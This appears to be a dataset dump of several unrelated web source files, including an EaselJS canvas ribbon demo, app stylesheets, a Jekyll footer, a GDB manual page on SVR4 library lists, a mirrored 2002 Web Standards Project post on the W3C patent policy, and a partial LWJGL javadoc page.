path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
assets/download/createJS-tutorial/easelJSDemo/show.html
NumerHero/NumerHero.github.io
<!doctype html> <html> <head> <title>画图</title> <meta charset="utf-8"> <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no"> <style> @font-face { font-family: 'Montserrat'; font-style: normal; font-weight: 700; src: local('Montserrat-Bold'), url(http://fonts.gstatic.com/s/montserrat/v6/IQHow_FEYlDC4Gzy_m8fcnbFhgvWbfSbdVg11QabG8w.woff) format('woff'); } * { margin: 0; padding: 0;} body { background: #f7f7f7; overflow: hidden; } canvas { position: absolute; top: 0; left: 0; z-index: -1; } #title { width: 1rem; position: absolute; top: 40%; left: 50%; margin-top: -20px; margin-left: -0.5rem; } #title h1 { font: 700 30px/45px "Montserrat" , "arial" , "微软雅黑"; letter-spacing: 9px; text-transform: uppercase; text-align: center; user-select: none; -webkit-user-select: none; } </style> <script src="../../../js/easeljs-0.8.2.min.js" ></script> </head> <body> <article id = "title"> <h1>ImWeb</h1> <h1>信管创业基地</h1> </article> <canvas id="stage"></canvas> <script> window.onload = function() { document.getElementsByTagName("html")[0].style.fontSize = window.innerWidth + "px"; var c = createjs; var oStage = new c.Stage("stage"); init(); function init() { var M = Math; var pr = window.devicePixelRatio || 1; var dPI = M.PI * 2; var Cos = M.cos; var Sin = M.sin; var random = M.random; var CanvasWidth = window.innerWidth; var CanvasHeight = window.innerHeight; var num = 3; // f 控制彩带宽度 var f = 90; // r 控制彩带颜色 var r = -90; oStage.canvas.width = CanvasWidth; oStage.canvas.height = CanvasHeight; // 全局透明度为0.7 oStage.alpha = 0.7; var Shape = new c.Shape(); function render() { // 随机中心带点值, 带点横坐标都是从0 开始 起点高度随机获取 var randomY = (random()*0.8 + 0.1).toFixed(1); // 如果不想随机获取高度,而是直接固定住起始点,可以设一个常量 // 确定中心带点后,获得到 f 带宽的上下两点 Point[0] Point[1] // 这里我就设置一个黄金比例 0.618咯 var Point = [ { x : 0 , y : CanvasHeight * 0.618 + f}, { x : 0 , y : CanvasHeight * 0.618 - f} ]; // 接下来,只要第二个带点的横坐标不小于屏幕的宽 + f 就一直执行draw函数 // 不断获取新的带点,并进行填充 while( Point[1].x < CanvasWidth + f ) { draw( Point ); } oStage.addChild(Shape); oStage.update(); } function judge(parameter) { // 随机确定的下一点纵坐标需要判断 [-1.1 0.9]*带宽 + 上一点的y值 var t = parameter + (random()*2 - 1.1) * f; // 如果随机出来的值已经超出了屏幕边界,那么就重新获取一次 return (t > CanvasHeight || t<0 ) ? judge(parameter) : t; } function draw( Point ) { // 获取随机颜色值 var randomColor = "#" + (Cos(r) * 127 + 128 << 16 | Cos(r + dPI/3) * 127 + 128 <<8 | Cos(r + dPI/3 * 2) * 127 + 128).toString(16); Shape.graphics.beginStroke(c.Graphics.getRGB(M.floor(random()*255),M.floor(random()*255),M.floor(random()*255),(random()*0.3 + 0.4).toFixed(1))); Shape.graphics.setStrokeStyle(2).beginFill(randomColor).mt(Point[0].x , Point[0].y) .lt(Point[1].x , Point[1].y); // 获取下一带点的坐标 var p = {}; // 下一点的横坐标 继承第二点横坐标 + 带宽减小到一个随机值 p.x = Point[1].x + (random()*2 - 0.25) * f; p.y = judge(Point[1].y); Shape.graphics.lt(p.x , p.y); Shape.graphics.closePath(); r -= dPI/-50; Point[0] = Point[1]; Point[1] = p; } for( var i = 0 ; i<num ;i++ ) { render(); } document.addEventListener("click" , function() { // 清除图层原有的绘制命令 Shape.graphics.clear(); oStage.update(); for( var i = 0 ; i<num ;i++ ) { render(); } }); document.addEventListener("ontouchstart" , function() { // 清除图层原有的绘制命令 Shape.graphics.clear(); oStage.update(); for( var i = 0 ; i<num ;i++ ) { render(); } }); } } </script> </body> </html>
public/assets/stylesheets/home.css
Rider-App/Rider
html { font-family: "Helvetica Neue", "Helvetica", sans-serif; font-size: 12pt; } .home-map-container { border: .1px solid white; background-image: url(/assets/images/static-map.png); background-size: cover; } .home-container { color: #462d28; background-color: white; margin-top: 20%; margin-bottom: 10%; padding-top: 10%; padding-bottom: 20%; } .home-container .home-search-label { width: 50%; margin-left: 8%; margin-top: 3px; margin-bottom: 3px; font-size: 2em; display: inline-block; } .home-container .home-favorites { margin-bottom: 3px; font-weight: 600; width: 30%; text-align: right; display: inline-block; } .home-container .fa-map-marker { position: absolute; display: block; margin-top: 10px; margin-left: 10%; } .home-searchbox { text-indent: 10%; font-size: 1.5em; margin-left: 8%; margin-right: 10%; width: 80%; height: 50px; border: 2px solid gray; border-radius: 5px; } input::-webkit-input-placeholder { font-size: 1em; } .home-learn-link { text-decoration: none; } .home-learn-more, .login-modal-cont .login-submit-btn { width: 60%; height: 40px; padding-top: 10px; background-color: white; color: #23c254; font-size: 2em; text-align: center; margin-left: 20%; margin-right: 15%; border-radius: 5px; } .powered-by { display: inline-block; width: 50%; margin-left: 8%; margin-right: 0; } .powered-by p { margin-top: 10px; font-size: 1em; display: inline-block; vertical-align: middle; margin-bottom: 40px; } .powered-by img { margin-top: 5px; width: 106px; height: 37px; padding-left: 3px; display: inline-block; } .home-go-link { text-decoration: none; } .home-ridesharing-go { display: inline-block; margin-top: 10px; margin-right: 11%; background-color: #57b74d; width: 100px; height: 75px; padding-top: 25px; padding-left: 5px; padding-right: 5px; border-radius: 5px; float: right; } .login-modal-cont { display: none; margin-left: 8%; width: 80%; height: 300px; background-color: gray; position: absolute; } .login-modal-cont input { font-size: 1.5em; margin-left: 8%; margin-right: 10%; width: 80%; height: 50px; border: 2px solid gray; border-radius: 5px; margin-top: 10px; } .login-modal-cont .login-submit-btn { margin-top: 10%; } .login-modal-cont .login-modal-x { margin-left: 90%; } .login-modal-cont.show { display: block; } /*# sourceMappingURL=home.css.map */
_includes/footer.html
elithrar/elithrar.github.io
<small >&copy; {{ site.time | date: "%Y" }} <a href="mailto:{{ site.author.email }}">{{ site.author.name }}</a> | His <a href="{{ site.author.othersite }}">photo journal</a> | Code snippets are <a href="http://choosealicense.com/licenses/mit/" title="MIT license" >MIT licensed</a > | Built with <a href="http://jekyllrb.com/">Jekyll</a></small > <!-- AnchorJS --> <script async type="text/javascript" src="/public/js/anchor.min.js"></script> <script defer> ;(function() { "use strict" anchors.options.placement = "left" anchors.add(".post > h2, .post > h3, .post > h4, .post > h5, .post > h6") })() </script>
tools/armgcc/share/doc/gcc-arm-none-eabi/html/gdb/Library-List-Format-for-SVR4-Targets.html
marduino/stm32Proj
<html lang="en"> <head> <title>Library List Format for SVR4 Targets - Debugging with GDB</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="Debugging with GDB"> <meta name="generator" content="makeinfo 4.11"> <link title="Top" rel="start" href="index.html#Top"> <link rel="up" href="Remote-Protocol.html#Remote-Protocol" title="Remote Protocol"> <link rel="prev" href="Library-List-Format.html#Library-List-Format" title="Library List Format"> <link rel="next" href="Memory-Map-Format.html#Memory-Map-Format" title="Memory Map Format"> <link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage"> <!-- Copyright (C) 1988-2013 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with the Invariant Sections being ``Free Software'' and ``Free Software Needs Free Documentation'', with the Front-Cover Texts being ``A GNU Manual,'' and with the Back-Cover Texts as in (a) below. (a) The FSF's Back-Cover Text is: ``You are free to copy and modify this GNU Manual. Buying copies from GNU Press supports the FSF in developing GNU and promoting software freedom.''--> <meta http-equiv="Content-Style-Type" content="text/css"> <style type="text/css"><!-- pre.display { font-family:inherit } pre.format { font-family:inherit } pre.smalldisplay { font-family:inherit; font-size:smaller } pre.smallformat { font-family:inherit; font-size:smaller } pre.smallexample { font-size:smaller } pre.smalllisp { font-size:smaller } span.sc { font-variant:small-caps } span.roman { font-family:serif; font-weight:normal; } span.sansserif { font-family:sans-serif; font-weight:normal; } --></style> </head> <body> <div class="node"> <p> <a name="Library-List-Format-for-SVR4-Targets"></a> Next:&nbsp;<a rel="next" accesskey="n" href="Memory-Map-Format.html#Memory-Map-Format">Memory Map Format</a>, Previous:&nbsp;<a rel="previous" accesskey="p" href="Library-List-Format.html#Library-List-Format">Library List Format</a>, Up:&nbsp;<a rel="up" accesskey="u" href="Remote-Protocol.html#Remote-Protocol">Remote Protocol</a> <hr> </div> <h3 class="section">E.15 Library List Format for SVR4 Targets</h3> <p><a name="index-library-list-format_002c-remote-protocol-2829"></a> On SVR4 platforms <span class="sc">gdb</span> can use the symbol table of a dynamic loader (e.g. <samp><span class="file">ld.so</span></samp>) and normal memory operations to maintain a list of shared libraries. Still a special library list provided by this packet is more efficient for the <span class="sc">gdb</span> remote protocol. <p>The &lsquo;<samp><span class="samp">qXfer:libraries-svr4:read</span></samp>&rsquo; packet returns an XML document which lists loaded libraries and their SVR4 linker parameters. For each library on SVR4 target, the following parameters are reported: <ul> <li><code>name</code>, the absolute file name from the <code>l_name</code> field of <code>struct link_map</code>. <li><code>lm</code> with address of <code>struct link_map</code> used for TLS (Thread Local Storage) access. <li><code>l_addr</code>, the displacement as read from the field <code>l_addr</code> of <code>struct link_map</code>. For prelinked libraries this is not an absolute memory address. It is a displacement of absolute memory address against address the file was prelinked to during the library load. <li><code>l_ld</code>, which is memory address of the <code>PT_DYNAMIC</code> segment </ul> <p>Additionally the single <code>main-lm</code> attribute specifies address of <code>struct link_map</code> used for the main executable. This parameter is used for TLS access and its presence is optional. <p><span class="sc">gdb</span> must be linked with the Expat library to support XML SVR4 library lists. See <a href="Expat.html#Expat">Expat</a>. <p>A simple memory map, with two loaded libraries (which do not use prelink), looks like this: <pre class="smallexample"> &lt;library-list-svr4 version="1.0" main-lm="0xe4f8f8"&gt; &lt;library name="/lib/ld-linux.so.2" lm="0xe4f51c" l_addr="0xe2d000" l_ld="0xe4eefc"/&gt; &lt;library name="/lib/libc.so.6" lm="0xe4fbe8" l_addr="0x154000" l_ld="0x152350"/&gt; &lt;/library-list-svr&gt; </pre> <p>The format of an SVR4 library list is described by this DTD: <pre class="smallexample"> &lt;!-- library-list-svr4: Root element with versioning --&gt; &lt;!ELEMENT library-list-svr4 (library)*&gt; &lt;!ATTLIST library-list-svr4 version CDATA #FIXED "1.0"&gt; &lt;!ATTLIST library-list-svr4 main-lm CDATA #IMPLIED&gt; &lt;!ELEMENT library EMPTY&gt; &lt;!ATTLIST library name CDATA #REQUIRED&gt; &lt;!ATTLIST library lm CDATA #REQUIRED&gt; &lt;!ATTLIST library l_addr CDATA #REQUIRED&gt; &lt;!ATTLIST library l_ld CDATA #REQUIRED&gt; </pre> </body></html>
app/assets/stylesheets/application.css
fckey/accountBook
/* * This is a manifest file that'll be compiled into application.css, which will include all the files * listed below. * * Any CSS and SCSS file within this directory, lib/assets/stylesheets, vendor/assets/stylesheets, * or vendor/assets/stylesheets of plugins, if any, can be referenced here using a relative path. * * You're free to add application-wide styles to this file and they'll appear at the top of the * compiled file, but it's generally better to create a new file per style scope. * *= require_self *= require_tree . */ #head{ clear: both; } #amount_history{ } #fixed_payment{ float: left; border : 1px solid #333; } #footer{ clear: both; with:100px; }
src/components/Hello/Hello.css
gianmarcotoso/redux-seed
.hello { text-decoration:underline; }
2002/12/30/counting-down-one-more-time-on-w3c-patent-policy/index.html
WebStandardsSherpa/webstandards.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Mirrored from www.webstandards.org/2002/12/30/counting-down-one-more-time-on-w3c-patent-policy/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 18 Aug 2017 17:50:16 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack --> <head> <title> Counting Down One More Time On W3C Patent Policy - The Web Standards Project</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="The Web Standards Project is a grassroots coalition fighting for standards which ensure simple, affordable access to web technologies for all." /> <meta name="MSSmartTagsPreventParsing" content="true" /> <script type="text/javascript" src="../../../../wp/wp-content/themes/web-standards-project/collapse.js"></script> <link rel="stylesheet" type="text/css" media="screen, projection" href="/wp/wp-content/themes/web-standards-project/styles.css" /> <link rel="stylesheet" type="text/css" media="print" href="/wp/wp-content/themes/web-standards-project/print.css" /> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="/feed/index.html" /> <link rel="alternate" type="text/xml" title="RSS .92" href="/feed/rss/index.html" /> <link rel="alternate" type="application/atom+xml" title="Atom 1.0" href="/feed/atom/index.html" /> <link rel="pingback" href="/wp/xmlrpc.php" /> <link rel="Shortcut Icon" type="image/ico" href="/files/theme/wasp.ico" /> <link rel="home" title="Web Standards Project Home" href="/index.html" /> <link rel='archives' title='March 2013' href='/2013/03/index.html' /> <link rel='archives' title='February 2012' href='/2012/02/index.html' /> <link rel='archives' title='December 2011' href='/2011/12/index.html' /> <link rel='archives' title='November 2011' href='/2011/11/index.html' /> <link rel='archives' title='March 2011' href='/2011/03/index.html' /> <link rel='archives' title='February 2011' href='/2011/02/index.html' /> <link rel='archives' title='January 2011' href='/2011/01/index.html' /> <link rel='archives' title='August 2010' href='/2010/08/index.html' /> <link rel='archives' title='June 2010' href='/2010/06/index.html' /> <link rel='archives' title='March 2010' href='/2010/03/index.html' /> <link rel='archives' title='February 2010' href='/2010/02/index.html' /> <link rel='archives' title='January 2010' href='/2010/01/index.html' /> <link rel='archives' title='November 2009' href='/2009/11/index.html' /> <link rel='archives' title='June 2009' href='/2009/06/index.html' /> <link rel='archives' title='May 2009' href='/2009/05/index.html' /> <link rel='archives' title='April 2009' href='/2009/04/index.html' /> <link rel='archives' title='March 2009' href='/2009/03/index.html' /> <link rel='archives' title='February 2009' href='/2009/02/index.html' /> <link rel='archives' title='January 2009' href='/2009/01/index.html' /> <link rel='archives' title='December 2008' href='/2008/12/index.html' /> <link rel='archives' title='November 2008' href='/2008/11/index.html' /> <link rel='archives' title='October 2008' href='/2008/10/index.html' /> <link rel='archives' title='September 2008' href='/2008/09/index.html' /> <link rel='archives' title='August 2008' href='/2008/08/index.html' /> <link rel='archives' title='July 2008' href='/2008/07/index.html' /> <link rel='archives' title='June 2008' href='/2008/06/index.html' /> <link rel='archives' title='May 2008' href='/2008/05/index.html' /> <link rel='archives' title='April 2008' href='/2008/04/index.html' /> <link rel='archives' title='March 2008' href='/2008/03/index.html' /> <link rel='archives' title='February 2008' href='/2008/02/index.html' /> <link rel='archives' title='January 2008' href='/2008/01/index.html' /> <link rel='archives' title='December 2007' href='/2007/12/index.html' /> <link rel='archives' title='November 2007' href='/2007/11/index.html' /> <link rel='archives' title='October 2007' href='/2007/10/index.html' /> <link rel='archives' title='September 2007' href='/2007/09/index.html' /> <link rel='archives' title='August 2007' href='/2007/08/index.html' /> <link rel='archives' title='June 2007' href='/2007/06/index.html' /> <link rel='archives' title='May 2007' href='/2007/05/index.html' /> <link rel='archives' title='April 2007' href='/2007/04/index.html' /> <link rel='archives' title='March 2007' href='/2007/03/index.html' /> <link rel='archives' title='February 2007' href='/2007/02/index.html' /> <link rel='archives' title='January 2007' href='/2007/01/index.html' /> <link rel='archives' title='December 2006' href='/2006/12/index.html' /> <link rel='archives' title='November 2006' href='/2006/11/index.html' /> <link rel='archives' title='October 2006' href='/2006/10/index.html' /> <link rel='archives' title='September 2006' href='/2006/09/index.html' /> <link rel='archives' title='August 2006' href='/2006/08/index.html' /> <link rel='archives' title='July 2006' href='/2006/07/index.html' /> <link rel='archives' title='June 2006' href='/2006/06/index.html' /> <link rel='archives' title='May 2006' href='/2006/05/index.html' /> <link rel='archives' title='April 2006' href='/2006/04/index.html' /> <link rel='archives' title='March 2006' href='/2006/03/index.html' /> <link rel='archives' title='February 2006' href='/2006/02/index.html' /> <link rel='archives' title='January 2006' href='/2006/01/index.html' /> <link rel='archives' title='December 2005' href='/2005/12/index.html' /> <link rel='archives' title='November 2005' href='/2005/11/index.html' /> <link rel='archives' title='October 2005' href='/2005/10/index.html' /> <link rel='archives' title='September 2005' href='/2005/09/index.html' /> <link rel='archives' title='August 2005' href='/2005/08/index.html' /> <link rel='archives' title='July 2005' href='/2005/07/index.html' /> <link rel='archives' title='June 2005' href='/2005/06/index.html' /> <link rel='archives' title='May 2005' href='/2005/05/index.html' /> <link rel='archives' title='April 2005' href='/2005/04/index.html' /> <link rel='archives' title='March 2005' href='/2005/03/index.html' /> <link rel='archives' title='February 2005' href='/2005/02/index.html' /> <link rel='archives' title='January 2005' href='/2005/01/index.html' /> <link rel='archives' title='December 2004' href='/2004/12/index.html' /> <link rel='archives' title='November 2004' href='/2004/11/index.html' /> <link rel='archives' title='October 2004' href='/2004/10/index.html' /> <link rel='archives' title='September 2004' href='/2004/09/index.html' /> <link rel='archives' title='August 2004' href='/2004/08/index.html' /> <link rel='archives' title='July 2004' href='/2004/07/index.html' /> <link rel='archives' title='June 2004' href='/2004/06/index.html' /> <link rel='archives' title='May 2004' href='/2004/05/index.html' /> <link rel='archives' title='April 2004' href='/2004/04/index.html' /> <link rel='archives' title='March 2004' href='/2004/03/index.html' /> <link rel='archives' title='February 2004' href='/2004/02/index.html' /> <link rel='archives' title='January 2004' href='/2004/01/index.html' /> <link rel='archives' title='December 2003' href='/2003/12/index.html' /> <link rel='archives' title='November 2003' href='/2003/11/index.html' /> <link rel='archives' title='October 2003' href='/2003/10/index.html' /> <link rel='archives' title='September 2003' href='/2003/09/index.html' /> <link rel='archives' title='August 2003' href='/2003/08/index.html' /> <link rel='archives' title='July 2003' href='/2003/07/index.html' /> <link rel='archives' title='June 2003' href='/2003/06/index.html' /> <link rel='archives' title='May 2003' href='/2003/05/index.html' /> <link rel='archives' title='April 2003' href='/2003/04/index.html' /> <link rel='archives' title='March 2003' href='/2003/03/index.html' /> <link rel='archives' title='February 2003' href='/2003/02/index.html' /> <link rel='archives' title='January 2003' href='/2003/01/index.html' /> <link rel='archives' title='December 2002' href='../../index.html' /> <link rel='archives' title='November 2002' href='../../../11/index.html' /> <link rel='archives' title='October 2002' href='../../../10/index.html' /> <link rel='archives' title='September 2002' href='../../../09/index.html' /> <link rel='archives' title='August 2002' href='../../../08/index.html' /> <link rel='archives' title='July 2002' href='../../../07/index.html' /> <link rel='archives' title='June 2002' href='../../../06/index.html' /> <link rel='archives' title='April 2002' href='../../../04/index.html' /> <link rel='archives' title='March 2002' href='../../../03/index.html' /> <link rel='archives' title='December 2001' href='/2001/12/index.html' /> <link rel='archives' title='September 2001' href='/2001/09/index.html' /> <link rel='archives' title='November 2000' href='/2000/11/index.html' /> <link rel='archives' title='July 2000' href='/2000/07/index.html' /> <link rel='archives' title='April 2000' href='/2000/04/index.html' /> <link rel='archives' title='March 1999' href='/1999/03/index.html' /> <link rel='archives' title='October 1998' href='/1998/10/index.html' /> <link rel='archives' title='August 1998' href='/1998/08/index.html' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="/wp/xmlrpc0db0.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="/wp/wp-includes/wlwmanifest.xml" /> <link rel='prev' title='Dear Web Developers: Browser Sniffing is Stupid' href='../../20/dear-web-developers-browser-sniffing-is-stupid/index.html' /> <link rel='next' title='Happy New Year!' href='../../31/happy-new-year/index.html' /> <meta name="generator" content="WordPress 3.3.1" /> <link rel='canonical' href='index.html' /> <link rel='shortlink' href='../../../../index8820.html?p=112' /> </head> <body id="top" class="individual"> <div id="container"> <div id="branding"> <h1><span>Working together for standards </span> <a href="/index.html">The Web Standards Project</a></h1> <a id="skip" href="#content-main" title="Skip to content">Skip to content</a> </div> <div id="nav-main"> <form id="fm-search" method="get" action="http://www.webstandards.org/index.php"> <fieldset> <legend>Search</legend> <label for="s"><span>Search WaSP</span> <input id="s" name="s" class="search" value="" /></label> <input type="submit" class="submit" name="submit" value="Go!" /> </fieldset> </form> <ul> <li><a href="/index.html" title="Home">Home</a></li> <li><a href="../../../../about/index.html" title="More About Who We Are">About</a></li> <li><a href="../../../../learn/index.html" title="More About Standards">Learn</a></li> <li><a href="/action/index.html" title="WaSP and Community Actions">Action</a></li> <li><a href="/buzz/index.html" title="Current and Archive Buzz Posts">Buzz</a></li> <li><a href="/press/index.html" title="In the Press and For the Press">Press</a></li> </ul> </div> <hr /> <div id="content"> <div id="content-main"> <div id="content-summary"> <h2 class="stmjrNoCollapse" id="post-112"><a href="index.html" rel="bookmark" title="Permanent Link: Counting Down One More Time On W3C Patent Policy">Counting Down One More Time On W3C Patent Policy</a></h2> <p class="stmjrNoCollapse">By <span class="vcard"><a href="../../../../about/members/bhenick/index.html" class="url fn">Ben Henick</a></span> | December 30th, 2002 | Filed in <a href="/buzz/web-standards-general/index.html" title="View all posts in Web Standards (general)" rel="category tag">Web Standards (general)</a></p> <a href="#content-sub" id="stmjrCollapse-content-summary" title="Skip to comment form">Skip to comment form</a> </div> <p>Tomorrow is the deadline for the <a href="http://www.w3.org/2002/12/patent-policy-lastcall-info.html">Call For Comments</a> phase of the latest World Wide Web Consortium <a href="http://www.w3.org/TR/2002/WD-patent-policy-20021114">Patent Policy Working Draft</a>.</p> <p>Needless to say, this version &#8211; based on royalty-free licensing &#8211; is perceived as more agreeable than its predecessor, which was based on a reasonable and non-discriminatory licensing model.</p> </div> <div id="content-replies"> </div> <div id="content-sub" title="Comment form"> <a href="#top" id="stmjrCollapse-content-sub" title="Return to top">Return to top</a> <h3 class="stmjrNoCollapse">Post a Reply</h3> <p>Comments are closed.</p> </div> </div> <hr /> <div id="nav-supp"> <p><a href="#top" title="Back to Top">Back to Top</a></p> </div> <div id="siteinfo"> <p>All of the entries posted in <abbr title="The Web Standards Project">WaSP</abbr> Buzz express the opinions of their individual authors. They do not necessarily reflect the plans or positions of the Web Standards Project as a group.</p> <p>This site is valid <a href="http://validator.w3.org/check/referer" title="Validate this document">XHTML 1.0 Strict</a>, <a href="http://jigsaw.w3.org/css-validator/check/referer" title="Validate this CSS">CSS</a> | Get Buzz via <a href="/feed/index.html"><abbr title="Really Simple Syndication">RSS</abbr></a> or <a href="/feed/atom/index.html">Atom</a> | <a href="../../../../about/colophon/index.html">Colophon</a> | <a href="../../../../about/legal/index.html">Legal</a></p> <!-- 11 queries. 0.195 seconds. --> </div> </div> </body> <!-- Mirrored from www.webstandards.org/2002/12/30/counting-down-one-more-time-on-w3c-patent-policy/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 18 Aug 2017 17:50:16 GMT --> </html> <!-- Dynamic page generated in 0.183 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2017-08-18 12:37:55 --> <!-- super cache -->
lib/lwjgl/javadoc/org/lwjgl/opengl/ARBTextureBorderClamp.html
jmcomets/tropical-escape
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_14) on Sun Nov 04 20:18:57 CET 2012 --> <TITLE> ARBTextureBorderClamp (LWJGL API) </TITLE> <META NAME="date" CONTENT="2012-11-04"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="ARBTextureBorderClamp (LWJGL API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/ARBTextureBorderClamp.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTessellationShader.html" title="class in org.lwjgl.opengl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/lwjgl/opengl/ARBTextureBufferObject.html" title="class in org.lwjgl.opengl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/lwjgl/opengl/ARBTextureBorderClamp.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ARBTextureBorderClamp.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> org.lwjgl.opengl</FONT> <BR> Class ARBTextureBorderClamp</H2> <PRE> java.lang.Object <IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>org.lwjgl.opengl.ARBTextureBorderClamp</B> </PRE> <HR> <DL> <DT><PRE>public final class <B>ARBTextureBorderClamp</B><DT>extends java.lang.Object</DL> </PRE> <P> <HR> <P> <!-- =========== FIELD SUMMARY =========== --> <A NAME="field_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Field Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/lwjgl/opengl/ARBTextureBorderClamp.html#GL_CLAMP_TO_BORDER_ARB">GL_CLAMP_TO_BORDER_ARB</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> </TABLE> &nbsp;<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD> </TR> </TABLE> &nbsp; <P> <!-- ============ FIELD DETAIL =========== --> <A NAME="field_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" 